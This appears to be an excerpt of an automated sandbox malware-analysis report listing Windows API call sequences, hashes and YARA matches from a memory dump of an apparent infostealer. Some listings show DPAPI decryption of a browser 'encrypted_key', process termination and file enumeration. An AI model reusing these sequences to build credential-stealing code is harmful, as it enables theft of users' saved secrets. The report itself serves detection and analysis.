                                    • Opcode Fuzzy Hash: f9234e9bd46cec9cf839bdda07d9ba2ba9c14a8e33b8e241be8001822baa8316
                                    • Instruction Fuzzy Hash: 0D812E728501089BEB04FBA1DC96EEE7338FF54304F554528F407B6092EF346A49EBA2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: e20abd537be7b898a20188e914ec4e32794ca842b90b9d69f4708b2f755d6673
                                    • Instruction ID: 7fb7db309a56c7f41492e2dc0d6bdcb7619b20746bd8d30f38b1b7438d82eaef
                                    • Opcode Fuzzy Hash: e20abd537be7b898a20188e914ec4e32794ca842b90b9d69f4708b2f755d6673
                                    • Instruction Fuzzy Hash: 2D415E75D10209AFDB04EFE5D845AEEB774BF84304F108128F416B6291DB34AA49DFA2
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                      • Part of subcall function 00C399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                      • Part of subcall function 00C399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                      • Part of subcall function 00C399C0: ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                      • Part of subcall function 00C399C0: LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                      • Part of subcall function 00C399C0: CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                      • Part of subcall function 00C48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C48E52
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C39D39
                                      • Part of subcall function 00C39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39AEF
                                      • Part of subcall function 00C39AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C34EEE,00000000,?), ref: 00C39B01
                                      • Part of subcall function 00C39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39B2A
                                      • Part of subcall function 00C39AC0: LocalFree.KERNEL32(?,?,?,?,00C34EEE,00000000,?), ref: 00C39B3F
                                      • Part of subcall function 00C39B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C39B84
                                      • Part of subcall function 00C39B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00C39BA3
                                      • Part of subcall function 00C39B60: LocalFree.KERNEL32(?), ref: 00C39BD3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: 099360d80dd5ee25e59c3ccceacb5b7f13e69019c754f6b7615f0424fd01c611
                                    • Instruction ID: d1c63960c9832715b499916363ad474d4ebcdbad6c7f239b415f380652e40905
                                    • Opcode Fuzzy Hash: 099360d80dd5ee25e59c3ccceacb5b7f13e69019c754f6b7615f0424fd01c611
                                    • Instruction Fuzzy Hash: B33132B6D10209ABCF14EFE4DC86AEFB7B8FF48304F144519E915A7241E7749A44CBA1
                                    APIs
                                    • memset.MSVCRT ref: 00C494EB
                                      • Part of subcall function 00C48D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C4951E,00000000), ref: 00C48D5B
                                      • Part of subcall function 00C48D50: RtlAllocateHeap.NTDLL(00000000), ref: 00C48D62
                                      • Part of subcall function 00C48D50: wsprintfW.USER32 ref: 00C48D78
                                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00C495AB
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C495C9
                                    • CloseHandle.KERNEL32(00000000), ref: 00C495D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                    • String ID:
                                    • API String ID: 3729781310-0
                                    • Opcode ID: 3d04da0ef6907293bfd6fbf29f7609637b1e5a4fcaa5eeca87aa6b054f63b7c2
                                    • Instruction ID: 217f20c566fcb40dc5695c63ba5f6b11441086eadb25ffc7049aab12cc860e70
                                    • Opcode Fuzzy Hash: 3d04da0ef6907293bfd6fbf29f7609637b1e5a4fcaa5eeca87aa6b054f63b7c2
                                    • Instruction Fuzzy Hash: C3312D71E002189FDB14DFD0DD49BEEB778FB44301F204559E50AAB184DB74AA89DF52
                                    APIs
                                    • CreateFileA.KERNEL32(00C43AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00C43AEE,?), ref: 00C492FC
                                    • GetFileSizeEx.KERNEL32(000000FF,00C43AEE), ref: 00C49319
                                    • CloseHandle.KERNEL32(000000FF), ref: 00C49327
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID:
                                    • API String ID: 1378416451-0
                                    • Opcode ID: 515bd4437c4a50d7a345800a6e330572585ae7880cf51144099f61ea5d6c81f3
                                    • Instruction ID: 2277789b53770941a03dd3b35199270ebae4cf68e187e099538ad6f4d8a757f7
                                    • Opcode Fuzzy Hash: 515bd4437c4a50d7a345800a6e330572585ae7880cf51144099f61ea5d6c81f3
                                    • Instruction Fuzzy Hash: C4F08C34E00208BBDB14DFB2DC09F9E77B9FB88310F108264F615A72D0D6B09A408B40
                                    APIs
                                    • __getptd.LIBCMT ref: 00C4C74E
                                      • Part of subcall function 00C4BF9F: __amsg_exit.LIBCMT ref: 00C4BFAF
                                    • __getptd.LIBCMT ref: 00C4C765
                                    • __amsg_exit.LIBCMT ref: 00C4C773
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00C4C797
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: 4bf42fa9fba0af9802959377501668b702a2d2487f02f230a2c286a730d6724f
                                    • Instruction ID: 994f39696713609104a44481666c284bf6efe334322f166e93afc557959fc58e
                                    • Opcode Fuzzy Hash: 4bf42fa9fba0af9802959377501668b702a2d2487f02f230a2c286a730d6724f
                                    • Instruction Fuzzy Hash: AEF0B4369427009BE760BBF8588775E37A07F00721F204149F814A61E3DB649D80BE56
                                    APIs
                                      • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C44F7A
                                    • lstrcat.KERNEL32(?,00C51070), ref: 00C44F97
                                    • lstrcat.KERNEL32(?,019D8A70), ref: 00C44FAB
                                    • lstrcat.KERNEL32(?,00C51074), ref: 00C44FBD
                                      • Part of subcall function 00C44910: wsprintfA.USER32 ref: 00C4492C
                                      • Part of subcall function 00C44910: FindFirstFileA.KERNEL32(?,?), ref: 00C44943
                                      • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C50FDC), ref: 00C44971
                                      • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C50FE0), ref: 00C44987
                                      • Part of subcall function 00C44910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C44B7D
                                      • Part of subcall function 00C44910: FindClose.KERNEL32(000000FF), ref: 00C44B92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: 7cd64bb149e9b66fe3c54104f1f32c55f9cad3a85358aa09f63c48e5ebc9601f
                                    • Instruction ID: 52b1df0c69e02c2933c3781432a8111e84693c638d8ab6839c414c0d62f55108
                                    • Opcode Fuzzy Hash: 7cd64bb149e9b66fe3c54104f1f32c55f9cad3a85358aa09f63c48e5ebc9601f
                                    • Instruction Fuzzy Hash: ED219876900208AFD754FBB0DC46EED333CBB94701F044564BA5DA2181EE749ACC9BA3